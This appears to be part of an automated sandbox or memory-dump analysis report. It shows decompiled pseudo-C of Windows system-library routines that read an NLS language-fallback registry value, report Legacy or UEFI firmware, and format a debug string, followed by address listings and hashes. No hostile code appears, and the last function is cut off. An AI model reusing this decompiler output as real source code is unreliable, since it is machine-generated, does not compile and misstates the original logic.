                                                    			E04B4E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04B4F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04B895D0();
						}
						if(_t78 != 0) {
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04B8FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04B8BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04B89600();
					if(_t97 < 0) {
						goto L6;
					}
					E04B8BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04B4F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04B8BB40(_t83, _t102 + 0x24, _t78);
								if(L04B543C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04B8BB40(_t84, _t102 + 0x24, _t94);
									if(L04B543C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                    0x04b4e620
                                                    0x04b4e628
                                                    0x04b4e62f
                                                    0x04b4e631
                                                    0x04b4e635
                                                    0x04b4e637
                                                    0x04b4e63e
                                                    0x04ba5503
                                                    0x04ba5503
                                                    0x04b4e64c
                                                    0x04b4e64c
                                                    0x04b4e651
                                                    0x00000000
                                                    0x00000000
                                                    0x04b4e661
                                                    0x04b4e665
                                                    0x04ba542a
                                                    0x04b4e715
                                                    0x04b4e71a
                                                    0x04b4e71c
                                                    0x04b4e720
                                                    0x04b4e720
                                                    0x04b4e727
                                                    0x04b4e736
                                                    0x04b4e736
                                                    0x04b4e743
                                                    0x04b4e743
                                                    0x04b4e673
                                                    0x04b4e678
                                                    0x04b4e67d
                                                    0x04b4e682
                                                    0x04b4e685
                                                    0x04b4e692
                                                    0x04b4e69b
                                                    0x04b4e6a3
                                                    0x04b4e6ad
                                                    0x04b4e6b1
                                                    0x04b4e6b2
                                                    0x04b4e6bb
                                                    0x04b4e6bf
                                                    0x04b4e6c0
                                                    0x04b4e6c8
                                                    0x04b4e6cc
                                                    0x04b4e6d5
                                                    0x04b4e6d9
                                                    0x00000000
                                                    0x00000000
                                                    0x04b4e6e5
                                                    0x04b4e6ea
                                                    0x04b4e6f9
                                                    0x04b4e70b
                                                    0x04b4e70f
                                                    0x04ba5439
                                                    0x04ba545e
                                                    0x04ba545e
                                                    0x00000000
                                                    0x04ba545e
                                                    0x04ba543b
                                                    0x04ba543e
                                                    0x04ba5440
                                                    0x04ba5445
                                                    0x04ba5472
                                                    0x04ba5475
                                                    0x04ba548d
                                                    0x04ba5493
                                                    0x04ba54a9
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba54ab
                                                    0x04ba54b4
                                                    0x04ba54bc
                                                    0x04ba54c8
                                                    0x04ba54de
                                                    0x04ba54fb
                                                    0x04ba54e0
                                                    0x04ba54e6
                                                    0x04ba54eb
                                                    0x04ba54eb
                                                    0x04ba54de
                                                    0x00000000
                                                    0x04ba54bc
                                                    0x04ba5477
                                                    0x04ba547a
                                                    0x04ba5480
                                                    0x04ba5483
                                                    0x04ba5486
                                                    0x04ba548b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba548b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba5447
                                                    0x04ba5447
                                                    0x04ba5447
                                                    0x04ba5447
                                                    0x04ba544e
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba5450
                                                    0x04ba5452
                                                    0x04ba5455
                                                    0x04ba545a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba545c
                                                    0x04ba546a
                                                    0x04ba546d
                                                    0x04ba546f
                                                    0x00000000
                                                    0x04ba546f
                                                    0x04b4e70f

                                                    Strings
                                                    • InstallLanguageFallback, xrefs: 04B4E6DB
                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04B4E68C
                                                    • @, xrefs: 04B4E6C0
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                    • API String ID: 0-1757540487
                                                    • Opcode ID: 28feeca173b06a779d25ccd51a5dc330e5e9e862f066e9e880dacc751a87203c
                                                    • Instruction ID: c2fa254ebc3a82507a1be5b1fb2869801a91d693ad80b371011ced024a1664c9
                                                    • Opcode Fuzzy Hash: 28feeca173b06a779d25ccd51a5dc330e5e9e862f066e9e880dacc751a87203c
                                                    • Instruction Fuzzy Hash: 26516E72508355ABD724DF68C440ABBB3E8FF88714F0509AEF98597250FB34EA14C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E04BC51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4c205f0);
				E04B9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04BC53CA(0);
						return E04B9D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04B8F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04B63690(1, _t117, 0x4b21810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04B8AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04B64620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04B8AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04BC500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04B89860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                    0x04bc51be
                                                    0x04bc51c3
                                                    0x04bc51c8
                                                    0x04bc51cd
                                                    0x04bc51d0
                                                    0x04bc51d3
                                                    0x04bc51d8
                                                    0x04bc51db
                                                    0x04bc51de
                                                    0x04bc51e0
                                                    0x04bc51e3
                                                    0x04bc51e6
                                                    0x04bc51e8
                                                    0x04bc5342
                                                    0x04bc5351
                                                    0x04bc5356
                                                    0x04bc535a
                                                    0x04bc5360
                                                    0x04bc5363
                                                    0x04bc5366
                                                    0x04bc5369
                                                    0x04bc5369
                                                    0x04bc536b
                                                    0x04bc536b
                                                    0x04bc5370
                                                    0x04bc53a3
                                                    0x04bc53a4
                                                    0x04bc53a6
                                                    0x04bc53ab
                                                    0x04bc53ab
                                                    0x04bc53ae
                                                    0x04bc53ae
                                                    0x04bc53b5
                                                    0x04bc53bf
                                                    0x04bc53bf
                                                    0x04bc5375
                                                    0x04bc5396
                                                    0x04bc53a0
                                                    0x04bc53a0
                                                    0x00000000
                                                    0x04bc5396
                                                    0x04bc5377
                                                    0x04bc5379
                                                    0x04bc537f
                                                    0x04bc538c
                                                    0x04bc5390
                                                    0x00000000
                                                    0x04bc5390
                                                    0x04bc51ee
                                                    0x04bc51f1
                                                    0x04bc5301
                                                    0x04bc5310
                                                    0x04bc5315
                                                    0x04bc5318
                                                    0x04bc531b
                                                    0x04bc5320
                                                    0x04bc532e
                                                    0x04bc5331
                                                    0x00000000
                                                    0x04bc5331
                                                    0x04bc5328
                                                    0x04bc5329
                                                    0x00000000
                                                    0x04bc5329
                                                    0x04bc51fa
                                                    0x04bc5235
                                                    0x04bc5236
                                                    0x04bc5239
                                                    0x04bc523f
                                                    0x04bc5240
                                                    0x04bc5241
                                                    0x04bc5242
                                                    0x04bc5246
                                                    0x04bc5247
                                                    0x04bc524e
                                                    0x04bc5251
                                                    0x04bc5267
                                                    0x04bc5269
                                                    0x04bc526e
                                                    0x04bc527d
                                                    0x04bc527e
                                                    0x04bc5281
                                                    0x04bc5282
                                                    0x04bc5287
                                                    0x04bc5288
                                                    0x04bc528a
                                                    0x04bc528f
                                                    0x04bc5294
                                                    0x00000000
                                                    0x00000000
                                                    0x04bc529a
                                                    0x04bc529c
                                                    0x04bc529e
                                                    0x04bc529e
                                                    0x04bc52a4
                                                    0x04bc52b0
                                                    0x00000000
                                                    0x00000000
                                                    0x04bc52ba
                                                    0x04bc52bc
                                                    0x04bc52bc
                                                    0x04bc52d4
                                                    0x04bc52d9
                                                    0x04bc52dc
                                                    0x04bc52e1
                                                    0x00000000
                                                    0x00000000
                                                    0x04bc52e7
                                                    0x04bc52f4
                                                    0x00000000
                                                    0x04bc52f4
                                                    0x04bc5270
                                                    0x00000000
                                                    0x04bc5270
                                                    0x04bc51fc
                                                    0x04bc51fd
                                                    0x04bc5202
                                                    0x04bc5203
                                                    0x04bc5205
                                                    0x04bc520a
                                                    0x04bc520f
                                                    0x00000000
                                                    0x00000000
                                                    0x04bc521b
                                                    0x04bc5226
                                                    0x04bc522b
                                                    0x04bc521d
                                                    0x04bc521d
                                                    0x04bc5222
                                                    0x04bc5222
                                                    0x04bc522d
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 0ecde45b68ec624efe7f1e83dd751593b163b8d4534ca619e4026d91c8619925
                                                    • Instruction ID: 2513f630226f081f7e2663e11b8cc324a707f4139cf08aacad0ad7431ef90c24
                                                    • Opcode Fuzzy Hash: 0ecde45b68ec624efe7f1e83dd751593b163b8d4534ca619e4026d91c8619925
                                                    • Instruction Fuzzy Hash: A6518371E00629AFDB24DFA8C990BADBBF8FF84704F5440ADE55AEB251D670B900CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E04B4B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4c1f7a8);
				E04B9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04B9D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04B8D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04B8F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04B9DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04B8B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04B8B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04B8E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04B8A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                    0x04b4b171
                                                    0x04b4b171
                                                    0x04b4b171
                                                    0x04b4b171
                                                    0x04b4b171
                                                    0x04b4b176
                                                    0x04b4b17b
                                                    0x04b4b180
                                                    0x04b4b186
                                                    0x04b4b18f
                                                    0x04b4b198
                                                    0x04b4b1a4
                                                    0x04b4b1aa
                                                    0x04ba4802
                                                    0x04ba4802
                                                    0x04ba4805
                                                    0x04ba480c
                                                    0x04ba480e
                                                    0x04b4b1d1
                                                    0x04b4b1d3
                                                    0x04b4b1de
                                                    0x04b4b1de
                                                    0x04ba4817
                                                    0x04ba481e
                                                    0x04ba4820
                                                    0x04ba4822
                                                    0x04ba4822
                                                    0x04ba4824
                                                    0x04ba4824
                                                    0x04ba482a
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba4835
                                                    0x04ba483a
                                                    0x04ba483d
                                                    0x04ba483f
                                                    0x04ba4842
                                                    0x04ba4842
                                                    0x04ba4842
                                                    0x04ba4846
                                                    0x04ba484c
                                                    0x04ba484e
                                                    0x04ba4851
                                                    0x04ba4851
                                                    0x04ba4853
                                                    0x04ba4854
                                                    0x04ba4854
                                                    0x04ba4858
                                                    0x04ba485a
                                                    0x04ba485a
                                                    0x04ba485d
                                                    0x04ba485f
                                                    0x04ba4861
                                                    0x04ba4861
                                                    0x04ba4866
                                                    0x04ba486b
                                                    0x04ba486e
                                                    0x04ba4871
                                                    0x04ba4876
                                                    0x04ba4876
                                                    0x04ba4878
                                                    0x04ba487b
                                                    0x04ba4884
                                                    0x04ba4884
                                                    0x00000000
                                                    0x04ba487d
                                                    0x04ba487d
                                                    0x04ba4882
                                                    0x04ba4889
                                                    0x04ba4889
                                                    0x04ba488f
                                                    0x04ba4891
                                                    0x04ba48e0
                                                    0x04ba48e2
                                                    0x04ba48e4
                                                    0x04ba48e4
                                                    0x04ba48e7
                                                    0x04ba48e7
                                                    0x04ba48ed
                                                    0x04ba48f4
                                                    0x04ba48f6
                                                    0x04ba4951
                                                    0x04ba4951
                                                    0x04ba4953
                                                    0x04ba4953
                                                    0x04ba4956
                                                    0x04ba4956
                                                    0x04ba4958
                                                    0x04ba4959
                                                    0x04ba4959
                                                    0x04ba495d
                                                    0x04ba495d
                                                    0x04ba495f
                                                    0x04ba495f
                                                    0x04ba4965
                                                    0x04ba4969
                                                    0x04ba49ba
                                                    0x04ba49ba
                                                    0x04ba49c1
                                                    0x04ba49c5
                                                    0x04ba49cc
                                                    0x04ba49d4
                                                    0x04ba49d7
                                                    0x04ba49da
                                                    0x04ba49e4
                                                    0x04ba49e5
                                                    0x04ba49f3
                                                    0x04ba4a02
                                                    0x00000000
                                                    0x04ba4a02
                                                    0x04ba4972
                                                    0x04ba4974
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba4976
                                                    0x04ba4979
                                                    0x04ba4982
                                                    0x04ba4983
                                                    0x04ba4984
                                                    0x04ba498b
                                                    0x04ba498d
                                                    0x04ba4991
                                                    0x04ba4993
                                                    0x04ba4999
                                                    0x04ba499d
                                                    0x04ba49a2
                                                    0x04ba49a2
                                                    0x04ba49a2
                                                    0x04ba4999
                                                    0x04ba49ac
                                                    0x00000000
                                                    0x04ba49b3
                                                    0x04ba48f8
                                                    0x04ba48fe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba48fe
                                                    0x04ba4895
                                                    0x04ba489c
                                                    0x04ba48ad
                                                    0x04ba48b2
                                                    0x04ba48b5
                                                    0x04ba48b7
                                                    0x04ba48ba
                                                    0x04ba48bc
                                                    0x04ba48c6
                                                    0x04ba48c6
                                                    0x04ba48cb
                                                    0x04ba48d1
                                                    0x04ba48d4
                                                    0x04ba48d8
                                                    0x04ba48d8
                                                    0x00000000
                                                    0x04ba48d8
                                                    0x04ba48be
                                                    0x04ba48c0
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba48c2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba48c4
                                                    0x00000000
                                                    0x04ba4882
                                                    0x04ba487b
                                                    0x04ba4904
                                                    0x04ba4906
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba4908
                                                    0x04ba490e
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba4910
                                                    0x04ba4917
                                                    0x04ba4917
                                                    0x00000000
                                                    0x04ba4917
                                                    0x04b4b1ba
                                                    0x04ba47f9
                                                    0x04ba47fc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba47fc
                                                    0x04b4b1c0
                                                    0x04b4b1c0
                                                    0x04b4b1c3
                                                    0x04b4b1cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: 00d859b5eaf9fd077a63e22b991cc6c5d53f95603b781a74ab1682f752f07a1c
                                                    • Instruction ID: 89868561e0879613c3090b59ada00b1974b9a72899fb89e72088746dee27744d
                                                    • Opcode Fuzzy Hash: 00d859b5eaf9fd077a63e22b991cc6c5d53f95603b781a74ab1682f752f07a1c
                                                    • Instruction Fuzzy Hash: CA51E171D082598EEF30CF74C845BAEBBB0EF40714F2041EDD859AB281D7B4A965DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B6B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E04B6B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
